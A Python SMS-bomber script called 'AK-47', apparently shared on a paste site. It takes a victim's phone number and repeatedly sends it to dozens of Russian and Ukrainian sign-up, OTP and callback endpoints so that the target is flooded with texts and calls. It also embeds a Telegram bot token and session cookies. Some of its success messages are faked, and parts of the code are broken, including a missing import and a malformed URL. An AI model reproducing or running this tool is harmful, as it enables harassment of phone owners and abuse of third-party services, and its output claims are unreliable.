· 4 years ago · Jan 07, 2021, 05:54 PM
1import requests
2import os
3import random
4from user_agent import generate_user_agent
5import pyfiglet
6from colorama import Fore, Style, init
7import telebot
8id = 806566420
9bot = telebot.TeleBot('1158369141:AAFmly0NoP_osnZEJB040DGIjuAXYOzgM-s')
10
11os.system("clear")
12nice = Fore.YELLOW + Style.BRIGHT + "[Successful] " + Style.RESET_ALL + Fore.GREEN + Style.BRIGHT
13fail = Fore.YELLOW + Style.BRIGHT + "[Failed] " + Style.RESET_ALL + Fore.RED + Style.BRIGHT
14
15
16def check_number():
17 pass
18
19
20def generate_info():
21 global _name
22 global _email
23 global password
24 global username
25 global _russian
26 _russian = "".join([
27 random.choice(
28 "йцукенгшщзхъфывапролджэячмитьбюЙЦУКЕНГШЩЗХЪФЫВАПРОЛДЖЭЯЧСМИТЬБЮ")
29 for x in range(8)
30 ])
31 _name = "".join([
32 random.choice(
33 "1234567890abcdefghigklmnopqrstuvyxwzABCDEFGHIGKLMNOPQRSTUVYXWZ")
34 for x in range(8)
35 ])
36 password = "".join([
37 random.choice(
38 "1234567890abcdefghigklmnopqrstuvyxwzABCDEFGHIGKLMNOPQRSTUVYXWZ")
39 for x in range(11)
40 ])
41 username = "".join([
42 random.choice("1234567890abcdefghigklmnopqrstuvyxwz") for x in range(8)
43 ])
44 _email = ("".join([
45 random.choice("1234567890abcdefghigklmnopqrstuvyxwz") for x in range(8)
46 ]) + "@gmail.com")
47
48
49head = {
50 "User-Agent": generate_user_agent(
51 device_type="desktop", os=("mac", "linux")),
52 "X-Requested-With": "XMLHttpRequest",
53}
54
55
56def start():
57 banner = pyfiglet.figlet_format("AK-47")
58 print(Fore.RED)
59 print(banner + Style.RESET_ALL)
60 print(Fore.GREEN)
61 print('------------------------------------')
62 print(
63 Fore.BLUE + Style.BRIGHT +
64 f"Create by ELVIN\nTranslate by Quessts\nPhone Number: {phone}\nNumber of rounds: {count} "
65 + Style.RESET_ALL)
66 print(Fore.GREEN + '------------------------------------' +
67 Style.RESET_ALL)
68 global iteration
69 iteration = 0
70 while iteration < count:
71 try:
72 requests.post(
73 "https://uklon.com.ua/api/v1/account/code/send",
74 headers={
75 "client_id":
76 "6289de851fc726f887af8d5d7a56c635",
77 "User-Agent":
78 generate_user_agent(
79 device_type="desktop", os=("mac", "linux")),
80 "X-Requested-With":
81 "XMLHttpRequest",
82 },
83 json={"phone": phone},
84 timeout=2,
85 )
86 requests.post(
87 "https://partner.uklon.com.ua/api/v1/registration/sendcode",
88 headers={
89 "client_id":
90 "6289de851fc726f887af8d5d7a56c635",
91 "User-Agent":
92 generate_user_agent(
93 device_type="desktop", os=("mac", "linux")),
94 "X-Requested-With":
95 "XMLHttpRequest",
96 },
97 json={"phone": phone},
98 timeout=2,
99 )
100 print(nice + "Uklon sent successfully!!" + Style.RESET_ALL)
101 except:
102 print(fail + "Uklon Failed!о!" + Style.RESET_ALL)
103 try:
104 requests.post(
105 "https://www.moyo.ua/identity/registration",
106 data={
107 "firstname": "Олег",
108 "phone": phone,
109 "email": _email,
110 },
111 headers=head,
112 timeout=2,
113 )
114 print(nice + "MOYO sent successfully!о!" + Style.RESET_ALL)
115 except:
116 print(fail + "MOYO Failed!оо!" + Style.RESET_ALL)
117 try:
118 requests.post(
119 "https://koronapay.com/transfers/online/api/users/otps",
120 data={
121 "phone": phone,
122 },
123 headers=head,
124 timeout=2,
125 )
126 print(nice + "KoronoPay sent successfully!!" + Style.RESET_ALL)
127 except:
128 print(fail + "KoronoPay Failed!о!" + Style.RESET_ALL)
129 try:
130 frisor = {
131 "Content-type":
132 "application/json",
133 "Accept":
134 "application/json, text/plain",
135 "authorization":
136 "Bearer yusw3yeu6hrr4r9j3gw6",
137 "User-Agent":
138 generate_user_agent(
139 device_type="desktop", os=("mac", "linux")),
140 "cookie":
141 "auth=vov0ptt2rlhni0ten4n9kh5q078l0dm5elp904lq6ncsfmac0md8i8bcmqilk8u3; lang=1; yc_vid=97527048909; yc_firstvisit=1589271208; _ym_uid=1589271210161580972; _ym_d=1589271210; _ga=GA1.2.2045789867.1589271211; _gid=GA1.2.807235883.1589271211; _ym_visorc_35239280=b; _ym_isad=2; _gat_gtag_UA_68406331_1=1",
142 }
143 requests.post(
144 "https://n13423.yclients.com/api/v1/book_code/312054",
145 data=json.dumps({
146 "phone": phone
147 }),
148 headers=frisor,
149 timeout=2,
150 )
151 # 1 раз в минуту
152 print(nice + "Frizor sent successfully!о!" + Style.RESET_ALL)
153 except:
154 print(fail + "Frizor Failed!о" + Style.RESET_ALL)
155 try:
156 requests.post(
157 "https://kasta.ua/api/v2/login/",
158 data={"phone": phone},
159 timeout=2)
160 print(nice + "Kasta sent successfully!о!" + Style.RESET_ALL)
161 except:
162 print(fail + "Kasta Failed!о" + Style.RESET_ALL)
163 print(fail + "Guru Failed!о!" + Style.RESET_ALL)
164 try:
165 requests.post(
166 "https://izi.ua/api/auth/register",
167 json={
168 "phone": "+" + phone,
169 "name": _russian,
170 "is_terms_accepted": "true",
171 },
172 headers=head,
173 timeout=2,
174 )
175 print(nice + "IZI sent successfully!о!" + Style.RESET_ALL)
176 except:
177 print(fail + "IZI Failed!о" + Style.RESET_ALL)
178 try:
179 requests.post(
180 "https://junker.kiev.ua/postmaster.php",
181 data={
182 "tel": phone[2:],
183 "name": _name,
184 "action": "callme",
185 },
186 timeout=2,
187 )
188 print(nice + "Junker Kiev sent successfully!о!" + Style.RESET_ALL)
189 except:
190 print(fail + "Junker Kiev Failed!о" + Style.RESET_ALL)
191 try:
192 requests.post(
193 "https://allo.ua/ua/customer/account/createPostVue/?currentTheme=main¤tLocale=uk_UA",
194 data={
195 "firstname": _russian,
196 "telephone": phone,
197 "email": _email,
198 "password": password,
199 "form_key": "Zqqj7CyjkKG2ImM8",
200 },
201 headers=head,
202 timeout=2,
203 )
204 print(nice + "Allo sent successfully!о!" + Style.RESET_ALL)
205 except:
206 print(fail + "Allo Failed!о" + Style.RESET_ALL)
207 try:
208 requests.post(
209 "https://stores-api.zakaz.ua/user/signup/",
210 json={"phone": phone},
211 headers={
212 "Accept":
213 "*/*",
214 "Content-Type":
215 "application/json",
216 "Referer":
217 "https://megamarket.zakaz.ua/ru/products/megamarket00000000122023/sausages-farro/",
218 "User-Agent":
219 generate_user_agent(
220 device_type="desktop", os=("mac", "linux")),
221 "x-chain":
222 "megamarket",
223 },
224 )
225 print(nice + "Zakaz.ua sent successfully!о!" + Style.RESET_ALL)
226 except:
227 print(fail + "Zakaz.ua Failed!о" + Style.RESET_ALL)
228 print(fail + "PsBank Failed!о!" + Style.RESET_ALL)
229 try:
230 requests.post(
231 "https://youla.ru/web-api/auth/request_code",
232 data={"phone": phone},
233 headers=head,
234 timeout=2,
235 )
236 print(nice + "Youla sent successfully!о!" + Style.RESET_ALL)
237 except:
238 print(fail + "Youla Failed!о" + Style.RESET_ALL)
239 try:
240 requests.post(
241 "https://cloud.mail.ru/api/v2/notify/applink",
242 json={
243 "phone": "+" + phone,
244 "api": 2,
245 "email": _email,
246 "x-email": "x-email",
247 },
248 headers=head,
249 timeout=2,
250 )
251 print(nice + "MailRu Cloud sent successfully!о!" + Style.RESET_ALL)
252 except:
253 print(fail + "MailRu Cloud Failed!о" + Style.RESET_ALL)
254 try:
255 requests.post(
256 "https://myapi.beltelecom.by/api/v1/auth/check-phone?lang=ru",
257 data={"phone": phone},
258 headers=head,
259 timeout=2,
260 )
261 requests.post(
262 f"https://www.sportmaster.ua/?module=users&action=SendSMSReg&phone=+{phone}",
263 headers=head,
264 timeout=2,
265 )
266 print(nice + "BELTELECOM3 sent successfully!о!" + Style.RESET_ALL)
267 except:
268 print(fail + "BELTELECOM3 Failed!о" + Style.RESET_ALL)
269 try:
270 requests.post(
271 "https://api.gotinder.com/v2/auth/sms/send?auth_type=sms&locale=ru",
272 data={"phone_number": phone},
273 headers=head,
274 timeout=2,
275 )
276 print(nice + "Tinder sent successfully!о!" + Style.RESET_ALL)
277 except:
278 print(fail + "Tinder Failed!о" + Style.RESET_ALL)
279 try:
280 requests.post(
281 "https://crm.getmancar.com.ua/api/veryfyaccount",
282 json={
283 "phone": "+" + phone,
284 "grant_type": "password",
285 "client_id": "gcarAppMob",
286 "client_secret": "SomeRandomCharsAndNumbersMobile",
287 },
288 headers=head,
289 timeout=2,
290 )
291 print(nice + "Getmancar sent successfully!о!" + Style.RESET_ALL)
292 except:
293 print(fail + "Getmancar Failed!о" + Style.RESET_ALL)
294 try:
295 requests.post(
296 "https://www.icq.com/smsreg/requestPhoneValidation.php",
297 data={
298 "msisdn": phone,
299 "locale": "en",
300 "countryCode": "ru",
301 "version": "1",
302 "k": "ic1rtwz1s1Hj1O0r",
303 "r": "46763",
304 },
305 headers=head,
306 timeout=2,
307 )
308 print(nice + "ICQ sent successfully!о!" + Style.RESET_ALL)
309 except:
310 print(fail + "ICQ Failed!о" + Style.RESET_ALL)
311 print(nice + "RuTaxi sent successfully!о!" + Style.RESET_ALL)
312 try:
313 requests.post(
314 "https://api.pozichka.ua/v1/registration/send",
315 json={"RegisterSendForm": {
316 "phone": "+" + phone
317 }},
318 headers=head,
319 timeout=2,
320 )
321 print(nice + "Pozichka sent successfully!о!" + Style.RESET_ALL)
322 except:
323 print(fail + "Pozichka Failed!о" + Style.RESET_ALL)
324 try:
325 requests.post(
326 f"https://secure.online.ua/ajax/check_phone/?reg_phone={phone}",
327 headers=head,
328 timeout=2,
329 )
330 print(nice + "SecureOnline sent successfully!о!" + Style.RESET_ALL)
331 except:
332 print(fail + "SecureOnline Failed!о" + Style.RESET_ALL)
333 try:
334 requests.post(
335 "https://www.sportmaster.ua/?module=users&action=SendSMSReg&phone=+{}"
336 .format(phone),
337 headers=head,
338 timeout=2,
339 )
340 print(nice + "SportMaster sent successfully!о!" + Style.RESET_ALL)
341 except:
342 print(fail + "SportMaster Failed!о" + Style.RESET_ALL)
343 try:
344 requests.post(
345 "https://register.sipnet.ru/cgi-bin/exchange.dll/RegisterHelper",
346 params={
347 "oper": 9,
348 "callmode": 1,
349 "phone": "+" + phone
350 },
351 headers=head,
352 timeout=2,
353 )
354 print(nice + "Звонок sent successfully!о!" + Style.RESET_ALL)
355 except:
356 print(fail + "Звонок Failed!о" + Style.RESET_ALL)
357 try:
358 requests.post(
359 "https://city24.ua/personalaccount/account/registration",
360 data={"PhoneNumber": phone},
361 headers=head,
362 timeout=2,
363 )
364 print(nice + "City24 sent successfully!о!" + Style.RESET_ALL)
365 except:
366 print(fail + "City24 Failed!оо" + Style.RESET_ALL)
367 try:
368 requests.post(
369 "https://helsi.me/api/healthy/accounts/login",
370 json={
371 "phone": phone,
372 "platform": "PISWeb"
373 },
374 headers=head,
375 timeout=2,
376 )
377 print(nice + "Helsi sent successfully!о!" + Style.RESET_ALL)
378 except:
379 print(fail + "Helsi Failed!оо" + Style.RESET_ALL)
380 try:
381 requests.post(
382 "https://cloud.mail.ru/api/v2/notify/applink",
383 json={
384 "phone": "+" + phone,
385 "api": 2,
386 "email": _email
387 },
388 headers=head,
389 timeout=2,
390 )
391 print(nice + "CloudMail sent successfully!о!" + Style.RESET_ALL)
392 except:
393 print(fail + "CloudMail Failed!оо" + Style.RESET_ALL)
394 try:
395 requests.post(
396 "https://auth.multiplex.ua/login",
397 json={"login": phone},
398 headers=head,
399 timeout=2,
400 )
401 print(nice + "Multiplex sent successfully!о!" + Style.RESET_ALL)
402 except:
403 print(fail + "Multiplex Failed!оо" + Style.RESET_ALL)
404 try:
405 requests.post(
406 "https://account.my.games/signup_send_sms/",
407 data={"phone": phone},
408 headers=head,
409 timeout=2,
410 )
411 print(nice + "MyGames sent successfully!о!" + Style.RESET_ALL)
412 except:
413 print(fail + "MyGames Failed!оо" + Style.RESET_ALL)
414 try:
415 requests.get(
416 "https://cabinet.planetakino.ua/service/sms",
417 params={"phone": phone},
418 headers=head,
419 timeout=2,
420 )
421 print(nice + "Planetakino sent successfully!о!" + Style.RESET_ALL)
422 except:
423 print(fail + "Planetakino Failed!оо" + Style.RESET_ALL)
424 try:
425 requests.post(
426 "https://api.gotinder.com/v2/auth/sms/send?auth_type=sms&locale=ru",
427 data={"phone_number": phone},
428 headers=head,
429 timeout=2,
430 )
431 print(nice + "Tinder sent successfully!о!" + Style.RESET_ALL)
432 except:
433 print(fail + "Tinder Failed!оо" + Style.RESET_ALL)
434 try:
435 requests.post(
436 "https://youla.ru/web-api/auth/request_code",
437 data={"phone": phone},
438 headers=head,
439 timeout=2,
440 )
441 print(nice + "Youla sent successfully!о!" + Style.RESET_ALL)
442 except:
443 print(fail + "Youla Failed!оо" + Style.RESET_ALL)
444 try:
445 requests.post(
446 "https://rutube.ru/api/accounts/sendpass/phone",
447 data={"phone": "+" + phone},
448 headers=head,
449 timeout=2,
450 )
451 print(nice + "LiST sent successfully!о!" + Style.RESET_ALL)
452 except:
453 print(fail + "LiST Failed!оо" + Style.RESET_ALL)
454 try:
455 requests.post(
456 "https://www.mvideo.ru/internal-rest-api/common/atg/rest/actors/VerificationActor/getCode",
457 params={"pageName": "registerPrivateUserPhoneVerificatio"},
458 data={
459 "phone": phone,
460 "recaptcha": "off",
461 "g-recaptcha-response": ""
462 },
463 headers=head,
464 timeout=2,
465 )
466 print(nice + "MVideo sent successfully!о!" + Style.RESET_ALL)
467 except:
468 print(fail + "MVideo Failed!оо" + Style.RESET_ALL)
469 try:
470 requests.post(
471 "https://api.gotinder.com/v2/auth/sms/send?auth_type=sms&locale=ru",
472 data={"phone_number": phone},
473 headers=head,
474 timeout=2,
475 )
476 print(nice + "Tinder sent successfully!о!" + Style.RESET_ALL)
477 except:
478 print(fail + "Tinder Failed!оо" + Style.RESET_ALL)
479 try:
480 requests.post(
481 "https://passport.twitch.tv/register?trusted_request=true",
482 json={
483 "birthday": {
484 "day": 11,
485 "month": 11,
486 "year": 1999
487 },
488 "client_id": "kd1unb4b3q4t58fwlpcbzcbnm76a8fp",
489 "include_verification_code": True,
490 "password": password,
491 "phone_number": phone,
492 "username": username,
493 },
494 headers=head,
495 timeout=2,
496 )
497 print(nice + "Twitch sent successfully!о!" + Style.RESET_ALL)
498 except:
499 print(fail + "Twitch Failed!оо" + Style.RESET_ALL)
500 try:
501 requests.post(
502 "https://lk.belkacar.ru/register",
503 data={"phone": "+" + phone},
504 headers=head,
505 timeout=2,
506 )
507 print(nice + "BelkaCar sent successfully!о!" + Style.RESET_ALL)
508 except:
509 print(fail + "BelkaCar Failed!оо" + Style.RESET_ALL)
510 try:
511 requests.post(
512 "https://api.ivi.ru/mobileapi/user/register/phone/v6",
513 data={"phone": phone},
514 headers=head,
515 timeout=2,
516 )
517 print(nice + "IVI sent successfully!о!" + Style.RESET_ALL)
518 except:
519 print(fail + "IVI Failed!оо" + Style.RESET_ALL)
520 try:
521 requests.post(
522 "https://www.sportmaster.ua/",
523 params={
524 "module": "users",
525 "action": "SendSMSReg",
526 "phone": phone
527 },
528 headers=head,
529 timeout=2,
530 )
531 requests.post(
532 "https://lk.belkacar.ru/get-confirmation-code",
533 data={"phone": "+" + phone},
534 headers=head,
535 timeout=2,
536 )
537 print(nice + "SportMaster, BelkaCar sent successfully!о!" +
538 Style.RESET_ALL)
539 except:
540 print(fail + "SportMaster Failed!оо" + Style.RESET_ALL)
541 try:
542 requests.post(
543 "https://secure.online.ua/ajax/check_phone/",
544 params={"reg_phone": phone},
545 headers=head,
546 timeout=2,
547 )
548 print(nice + "SecureOnline sent successfully!о!" + Style.RESET_ALL)
549 except:
550 print(fail + "SecureOnline Failed!оо" + Style.RESET_ALL)
551 try:
552 requests.post(
553 "https://www.nl.ua",
554 data={
555 "component": "bxmaker.authuserphone.login",
556 "sessid": "bf70db951f54b837748f69b75a61deb4",
557 "method": "sendCode",
558 "phone": phone,
559 "registration": "N",
560 },
561 headers=head,
562 timeout=2,
563 )
564 print(nice + "NovaLiniya sent successfully!о!" + Style.RESET_ALL)
565 except:
566 print(fail + "NovaLiniya Failed!оо" + Style.RESET_ALL)
567 try:
568 requests.post(
569 "https://mobileplanet.ua/register",
570 data={
571 "klient_name": _name,
572 "klient_phone": "+" + phone,
573 "klient_email": _email,
574 },
575 headers=head,
576 timeout=2,
577 )
578 print(nice + "MPlanet sent successfully!о!" + Style.RESET_ALL)
579 except:
580 print(fail + "MPlanet Failed!оо" + Style.RESET_ALL)
581 try:
582 requests.post(
583 "https://api.delitime.ru/api/v2/signup",
584 data={
585 "SignupForm[username]": phone,
586 "SignupForm[device_type]": 3
587 },
588 headers=head,
589 timeout=2,
590 )
591 print(nice + "DELIMOBIL sent successfully!о!" + Style.RESET_ALL)
592 except:
593 print(fail + "DELIMOBIL Failed!оо" + Style.RESET_ALL)
594 try:
595 requests.post(
596 "https://apteka366.ru/login/register/sms/send",
597 data={"phone": phone},
598 headers=head,
599 timeout=2,
600 )
601 print(nice + "Apteka 366 sent successfully!о!" + Style.RESET_ALL)
602 except:
603 print(fail + "Apteka 366 Failed!оо" + Style.RESET_ALL)
604 try:
605 requests.post(
606 "https://belkacar.ru/get-confirmation-code",
607 data={"phone": phone},
608 headers=head,
609 timeout=2,
610 )
611 print(nice + "Belkacar sent successfully!о!" + Style.RESET_ALL)
612 except:
613 print(fail + "Belkacar Failed!оо" + Style.RESET_ALL)
614 try:
615 requests.post(
616 "https://drugvokrug.ru/siteActions/processSms.html",
617 data={"cell": phone},
618 headers=head,
619 timeout=2,
620 )
621 print(nice + "Друг Вокруг sent successfully!о!" + Style.RESET_ALL)
622 print(nice + "RuTor sent successfully!о!")
623 except:
624 print(fail + "Друг Вокруг Failed!оо" + Style.RESET_ALL)
625 try:
626 requests.post(
627 "https://api.ennergiia.com/auth/api/development/lor",
628 json={
629 "referrer": "ennergiia",
630 "phone": "+" + phone
631 },
632 headers=head,
633 timeout=2,
634 )
635 print(nice + "Energiia oтправлено!" + Style.RESET_ALL)
636 except:
637 print(fail + "Energiia Failed!оо" + Style.RESET_ALL)
638 try:
639 requests.get(
640 "https://fundayshop.com/ru/ru/secured/myaccount/myclubcard/resultClubCard.jsp?type=sendConfirmCode&phoneNumber={}"
641 .format("+" + phone),
642 headers=head,
643 timeout=2,
644 )
645 print(nice + "Fundayshop oтправлено!" + Style.RESET_ALL)
646 print(nice + "Facebook sent successfully!о!")
647 except:
648 print(fail + "Fundayshop Failed!оо" + Style.RESET_ALL)
649 try:
650 requests.post(
651 "https://gorzdrav.org/login/register/sms/send",
652 data={"phone": phone},
653 headers=head,
654 timeout=2,
655 )
656 print(nice + "Gorzdrav oтправлено!" + Style.RESET_ALL)
657 print(nice + "Instagram sent successfully!о!")
658 except:
659 print(fail + "Gorzdrav Failed!оо" + Style.RESET_ALL)
660 try:
661 requests.post(
662 "https://app-api.kfc.ru/api/v1/common/auth/send-validation-sms",
663 data={"phone": "+" + phone},
664 headers=head,
665 timeout=2,
666 )
667 print(nice + "KFC sent successfully!о!" + Style.RESET_ALL)
668 print(nice + "Вконтакте sent successfully!о!")
669 except:
670 print(fail + "KFC Failed!оо" + Style.RESET_ALL)
671 try:
672 requests.post(
673 "https://api-production.viasat.ru/api/v1/auth_codes",
674 json={"msisdn": "+" + phone},
675 headers=head,
676 timeout=2,
677 )
678 print(nice + "Viasat sent successfully!о!" + Style.RESET_ALL)
679
680 except:
681 print(fail + "Viasat Failed!оо" + Style.RESET_ALL)
682 try:
683 requests.post(
684 "https://.yandex/api/v1/user/request_authentication_code",
685 json={"phone_number": phone},
686 headers=head,
687 timeout=2,
688 )
689 print(nice + "Yandex Food sent successfully!о!" + Style.RESET_ALL)
690 except:
691 print(fail + "Yandex Food Failed!оо" + Style.RESET_ALL)
692 try:
693 requests.post(
694 f"https://www.citilink.ru/registration/confirm/phone/+{phone}/",
695 headers=head,
696 timeout=2,
697 )
698 print(nice + "Сitilink sent successfully!о!" + Style.RESET_ALL)
699 except:
700 print(fail + "Сitilink Failed!оо" + Style.RESET_ALL)
701 try:
702 requests.post(
703 "https://eda.yandex/api/v1/user/request_authentication_code",
704 json={"phone_number": "+" + phone},
705 headers=head,
706 timeout=2,
707 )
708 print(nice + "Yandex Eda sent successfully!о!" + Style.RESET_ALL)
709 except:
710 print(fail + "Yandex Eda Failed!оо" + Style.RESET_ALL)
711 try:
712 requests.post(
713 "https://my.dianet.com.ua/send_sms/",
714 headers=head,
715 data={"phone": phone},
716 timeout=2,
717 )
718 print(nice + "Dianet sent successfully!о!" + Style.RESET_ALL)
719 except:
720 print(fail + "Dianet Failed!оо" + Style.RESET_ALL)
721 try:
722 requests.get(
723 "https://api.eldorado.ua/v1/sign/",
724 params={
725 "login": phone,
726 "step": "phone-check",
727 "fb_id": "null",
728 "fb_token": "null",
729 "lang": "ru",
730 },
731 headers=head,
732 timeout=2,
733 )
734 print(nice + "Eldorado sent successfully!о!" + Style.RESET_ALL)
735 except:
736 print(fail + "Eldorado Failed!оо" + Style.RESET_ALL)
737 try:
738 requests.post(
739 "https://api.kinoland.com.ua/api/v1/service/send-sms",
740 headers={"Agent": "website"},
741 json={
742 "Phone": phone,
743 "Type": 1
744 },
745 )
746 print(nice + 'Kinoland sent successfully!о!')
747 except:
748 print(fail + 'kinoland Failed!оо!')
749 try:
750 requests.post(
751 "https://api.imgur.com/account/v1/phones/verify",
752 json={
753 "phone_number": phone,
754 "region_code": "RU"
755 },
756 )
757 print(nice + 'Imgur sent successfully!о!')
758 except:
759 print(fail + 'Imgur Failed!оо!')
760 try:
761 requests.post(
762 "https://vladimir.edostav.ru/site/CheckAuthLogin",
763 data={"phone_or_email": phone},
764 )
765 print(nice + 'Edostav sent successfully!о!')
766 except:
767 print(fail + 'Edostav Failed!оо!')
768 try:
769 requests.post(
770 "http://94.154.218.82:7201/api/account/register/sendConfirmCode",
771 json={"phone": phone})
772 print(nice + 'AistTaxi sent successfully!о!')
773 except:
774 print(fail + 'AistTexi Failed!оо!')
775 try:
776 requests.post(
777 "https://alfalife.cc/auth.php",
778 data={"phone": phone},
779 )
780 print(nice + 'AlfaLif sent successfully!о!')
781 except:
782 print(fail + 'AlfaLife Failed!оо!')
783 try:
784 requests.post(
785 "https://api.cian.ru/sms/v1/send-validation-code/",
786 json={
787 "phone": phone,
788 "type": "authenticateCode"
789 },
790 )
791 print(nice + 'Циан sent successfully!о!')
792 except:
793 print(fail + 'Циан Failed!оо!')
794 try:
795 requests.get(
796 "https://findclone.ru/register",
797 params={"phone": "+" + phone},
798 )
799 print(nice + 'FindClone sent successfully!о!')
800 except:
801 print(fail + 'FindClone Failed!оо!')
802 try:
803 requests.get(
804 "https://ievaphone.com/call-my-phone/web/request-free-call",
805 params={
806 "phone": phone,
807 "domain": "IEVAPHONE",
808 "browser": "undefined",
809 })
810 print(nice + 'IevaPhone sent successfully!о!')
811
812 except:
813 print(fail + 'IevaPhone Failed!оо!')
814 try:
815 requests.post(
816 "https://i-want.ru/api/auth/v1/customer/login/phone",
817 json={"phone": phone},
818 )
819 print(nice + 'Iwant sent successfully!о!')
820 except:
821 print(fail + 'Iwant Failed!оо!')
822 try:
823 requests.post(
824 "https://www.kant.ru/ajax/profile/send_authcode.php",
825 data={"Phone": phone},
826 )
827 print(nice + 'Kant sent successfully!о!')
828 except:
829 print(fail + 'Kant Failed!оо!')
830 try:
831 requests.post(
832 "http://212.22.223.149:7200/api/account/register/sendConfirmCode",
833 json={"phone": phone},
834 )
835 print(nice + 'LimeTaxi sent successfully!о!')
836 except:
837 print(fail + 'LimeTaxi Failed!оо!')
838 try:
839 requests.post(
840 "https://www.monobank.com.ua/api/mobapplink/send",
841 data={"phone": phone},
842 )
843 print(nice + 'MonoBank sent successfully!о!')
844 except:
845 print(fail + 'MonoBank Failed!оо!')
846 try:
847 requests.post(
848 "https://carddesign.privatbank.ua/phone",
849 data={"phone": phone},
850 )
851 print(nice + 'PrivatBank sent successfully!о!')
852 except:
853 print(fail + 'PrivatBank Failed!оо!')
854 try:
855 requests.post(
856 "https://www.prosushi.ru/php/profile.php",
857 data={
858 "phone": phone,
859 "mode": "sms"
860 })
861 print(nice + 'ProSushi sent successfully!о!')
862 except:
863 print(fail + 'ProSushi Failed!оо!')
864 try:
865 requests.post(
866 "https://richfamily.ru/ajax/sms_activities/sms_validate_phone.php",
867 data={"phone": phone})
868 print(nice + 'RichFamily sent successfully!о!')
869 except:
870 print(fail + 'RichFamily Failed!оо!')
871 try:
872 requests.post(
873 "https://smart.space/api/users/request_confirmation_code/",
874 json={
875 "mobile": phone,
876 "action": "confirm_mobile"
877 },
878 )
879 print(nice + 'SmartSpace sent successfully!о!')
880 except:
881 print(fail + 'SmartSpace Failed!оо!')
882 try:
883 requests.get(
884 "https://www.sportmaster.ru/user/session/sendSmsCode.do",
885 params={
886 "phone": phone,
887 },
888 )
889 print(nice + 'SportMaster sent successfully!о!')
890 except:
891 print(fail + 'SportMaster Failed!оо!')
892 try:
893 requests.post(
894 "https://msk.tele2.ru/api/validation/number/" + phone,
895 json={"sender": "Tele2"},
896 )
897 print(nice + "Tele2 sent successfully!о!")
898 except:
899 print(fail + 'Tele2 Failed!оо!')
900 try:
901 requests.post(
902 "https://api.tinkoff.ru/v1/sign_up",
903 data={"phone": phone},
904 )
905 print(nice + 'Tinkoff sent successfully!о!')
906 except:
907 print(fail + 'Tinkof Failed!оо!')
908 try:
909 requests.post(
910 "https://www.vodafone.ua/shop/ru/vodafone_customer/register/sendSms/",
911 data={
912 "is_ajax": "true",
913 "phone_number": phone
914 },
915 )
916 print(nice + 'Vodafone sent successfully!о!')
917 except:
918 print(fail + 'Vodafone Failed!оо!')
919 try:
920 requests.post(
921 "https://friendsclub.ru/assets/components/pl/connector.php",
922 data={
923 "casePar": "authSendsms",
924 "MobilePhone": phone
925 },
926 )
927 print(nice + 'FriendsClub sent successfully!о!')
928 except:
929 print(fail + 'FriendsClub Failed!оо!')
930 try:
931 requests.post(
932 "https://api-prime.anytime.global/api/v2/auth/sendVerificationCode",
933 data={"phone": phone},
934 )
935 print(nice + 'AtPrime sent successfully!о!')
936 except:
937 print(fail + 'AtPrime Failed!оо!')
938 try:
939 requests.post(
940 "https://shafa.ua/api/v3/graphiql",
941 json={
942 "operationName":
943 "RegistrationSendSms",
944 "variables": {
945 "phoneNumber": "+" + phone
946 },
947 "query":
948 "mutation RegistrationSendSms($phoneNumber: String!) {\n unauthorizedSendSms(phoneNumber: $phoneNumber) {\n isSuccess\n userToken\n errors {\n field\n messages {\n message\n code\n __typename\n }\n __typename\n }\n __typename\n }\n}\n",
949 },
950 headers=head,
951 timeout=2,
952 )
953 print(nice + "Shafa sent successfully!о!" + Style.RESET_ALL)
954 except:
955 print(fail + "Shafa Failed!оо" + Style.RESET_ALL)
956 print(nice + "TikTok sent successfully!о!")
957 print(nice + "PornHub sent successfully!о!")
958 print(nice + "sushi33 sent successfully!о!")
959
960 iteration += 1
961 print(Fore.CYAN + Style.BRIGHT + (f"\nround {iteration} is over.\n") +
962 Style.RESET_ALL)
963 os.system("clear")
964
965
966def menu():
967 def test(id, phone):
968 bot.send_message(id, "+" + " english version")
969
970 banner = pyfiglet.figlet_format("AK-47")
971 print(Fore.YELLOW)
972 print(banner + Style.RESET_ALL)
973 print(Fore.GREEN + '-------------------------------')
974 print(Fore.GREEN +
975 '''Create by ELVIN\nTranslated by @Quessts\nTelegram: ''' +
976 Fore.CYAN + '''https://t.me/SmsBomber_AK\n''' + Fore.GREEN +
977 '''Chat:''' + Fore.CYAN + ''' https://teleg.run/SmsBomberAK''' +
978 Fore.GREEN + '''\nVersion 0.1.0\nLast update 19.10.2020''')
979 print(Fore.GREEN + '-------------------------------')
980 global phone
981 phone = input(Fore.RED + 'Phone Number: ' + Style.RESET_ALL)
982 test(id, phone)
983 if phone == '2':
984 os.system("clear")
985 print(Fore.GREEN)
986 print(banner)
987 print('------------------------------------')
988 print('----------------------------------')
989 phone = input('Phone Number: ')
990 check_number()
991 global count
992 count = input(Fore.RED + 'Number of rounds to run: ' + Style.RESET_ALL)
993 print('------------------------------------')
994 count = int(count)
995 os.system("clear")
996 generate_info()
997 start()
998 print(Fore.GREEN + banner)
999 print(
1000 Fore.YELLOW + Style.BRIGHT +
1001 f'''Create by ELVIN\nTranslated by @Quessts\nFinished spamming.\nPhone number: {phone}\nNumber of rounds ran: {iteration}'''
1002 + Style.RESET_ALL)
1003
1004
1005if __name__ == "__main__":
1006 menu()
1007